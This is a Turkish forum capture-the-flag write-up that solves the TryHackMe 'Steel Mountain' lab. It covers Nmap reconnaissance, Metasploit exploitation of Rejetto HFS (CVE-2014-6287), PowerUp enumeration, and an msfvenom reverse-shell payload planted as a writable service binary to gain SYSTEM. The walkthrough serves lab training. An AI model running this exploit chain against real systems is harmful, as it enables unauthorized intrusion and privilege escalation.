THM Steel Mountain CTF WriteUp

Ghost Killer

Özel Üye
13 Ocak 2019
11,238
7,708
Herkese merhaba arkadaşlar. Bu konumuzda sizlerle beraber TryHackMe (THM) sitesinde bulunan Steel Mountain isimli makineyi çözeceğiz. Hemen başlayalım.

Bilgi Toplama

Makineyi çözmeden önce bilgi toplamamız gerekiyor. Nmap aracımız ile bilgi topluyoruz.

Komutumuz;

Kod:
sudo nmap -A -T4 makine ip

Tarama yaptığımızda 80, 135, 139, 445, 3389, 8080, 49152, 49153, 49154, 49155, 49156, 49163 portlarının açık olduğunu görüyoruz.


qn5be2.png


İlk soruda ayın elemanının kim olduğu soruluyor.

Bunu bulabilmek için ilk olarak makinemizin ip adresine gitmemiz gerekiyor.

http://10.10.214.101:80 adresine gidilir.


p91in7.png


Adrese gittiğimizde bizi böyle bir sayfa karşılıyor. Sağ tık, View Page Source dedikten sonra sayfa kaynağı açıyoruz. Burada görselin adı gözüküyor. Yani ilk sorumuzun cevabı " Bill Harper " olmuş oluyor.

4wmwvm.png


Bir sonraki soruda web sunucusunun çalıştığı diğer port soruluyor. Nmap taraması ile diğer http portunun 8080 olduğu biliniyor. http://10.10.214.101:8080 gidildiğinde http file server ile karşılaşılıyor.

6dpvph.png


Bu komutumuz ile tarama yapmaya devam ediyoruz.

Komutumuz;

Kod:
sudo nmap -A –script vuln -T4 10.10.214.101

HFS 2.3’nin zafiyet barındırdığı bulunabilir. Fakat TryHackMe’deki sorusunda kastedilen exploit CVE-2011-3192 değil.

axa7qq.jpg


HFS 2.3 google’da aratıyoruz. HTTP File Server tam adının Rejetto HTTP File Server olduğu gördük. ve ilk çıkan sonuçta güncel exploit, exploit-db sitesinde gözüküyor.

bp99in.jpg


Exploit’in adının CVE-2014-6287 olduğu öğrenmiş olduk.

b514ck.jpg


Böylelikle sırasıyla

Task 2 kısmının ilk sorusunun cevabı: 8080

ikinci sorunun cevabı: rejetto http file server

üçüncü sorunun cevabı: 2014-6287

bu sayede üç soru birden cevaplamış olduk.


am8mex.jpg


Şimdi devam edelim.

Bu exploiti kullanmak için

Kod:
msfconsole -q

komutu ile m e t a sploit aracımızı başlatıyoruz. Hemen ardından

Kod:
search cve-2014-6287

komutumuz ile exploiti aratıyoruz.


khswaz.png


Kod:
use 0

komutumuz ile exploiti hazır hale getiriyoruz.

Hemen ardından

Kod:
show options

komutumuz ile ile düzenlenmesi gereken konfigürasyonlar görüntülüyoruz.


cdb3gb.png


Kullanılabilecek komutlarımız ise şöyle;

set RHOSTS 10.10.174.85 hedef ip belirlenir.

set RPORT 8080 hedef port belirlenir.

set SRVHOST <local_ip> local ip belirlenir.

set LHOST <local_ip> payload’ın local ip’si belirlenir.

şimdi ise exploit komutuyla exploiti aktif ediyoruz..


gq78md.jpg


cd c:/users/bill/desktop

cat user.txt ile user flag bulmuş oluyoruz.

jpssof.jpg


TryHackMe root yetkisi elde edilmesi için PowerUp ile bir sistem taraması yapılması öneriyor.


nvvoug.jpg


Bu komutumuzla

Kod:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

github’dan PowerUp.ps1 indiriyoruz.


ekilmu.png


Meterpreter yazarak komut satırına dönüyoruz.

upload /home/kali/Downloads/PowerUp.ps1 local makinemizden hedef makineye PowerUp scripti yüklüyoruz.

load powershell ile powershell yüklüyoruz.

Kod:
powershell_shell

komutuyla powershell taraması aktif hale getirilir. Çok kısa süre içerisinde AdvancedSystemCare9 programının istismar edilebileceği saptamış olduk.


j29kso.jpg


Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=4443 -f exe -o Advanced.exe

msfvenom aracılığıyla yerel makinede localhost ve localport belirlenerek oluşturulan Advanced.exe adında bir reverse_tcp payload oluşturuyoruz.

1w668h.jpg


cd "C:\Program Files (x86)\IObit" hedef dizine gidiyoruz.

upload /home/kali/Advanced.exe ile payload'ın olduğu zararlı program local makineden hedef makineye yüklüyoruz.


oujimn.jpg


Kod:
background

komutumuz ile ****sploit'e geri dönüyoruz.

use exploit/multi/handler ile kullanılan payload değiştiriyoruz.

set LHOST <local_ip> local ip belirliyoruz.

set LPORT 4443 ile locap port belirliyoruz.

Kod:
run -j

komutumuz ile payload çalıştırıyoruz.


ts2wxv.jpg


Kod:
sessions -i 1

komutumuz ile daha önce açılan oturuma gidiyoruz.

shell payload çalıştırıyoruz.

Kod:
sc stop AdvancedSystemCareService9

komutumuz ile çalışan Advanced servisi durduruyoruz.

Kod:
sc start AdvancedSystemCareService9

komutumuz ile servis yeniden çalıştırıldığında payload aktif oluyor ve yeni meterpreter oturumu oluşuyor.


q8z42y.jpg


Kod:
sessions -i 2

yeni oturuma bağlanıyoruz.

Kod:
cd c:/users/administrator/desktop
komutumuz ile geçiş yapıyoruz.

cat root.txt ile root flag bulmuş oluyoruz.


am4w4c.jpg



iUBacd.gif



Evet arkadaşlar bu sayede makinemizi çözmüş olduk. Konumuzun sonuna geldik. Okuduğunuz için teşekkürler. Başka bir konuda görüşmek üzere. :Smiley1009:














 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.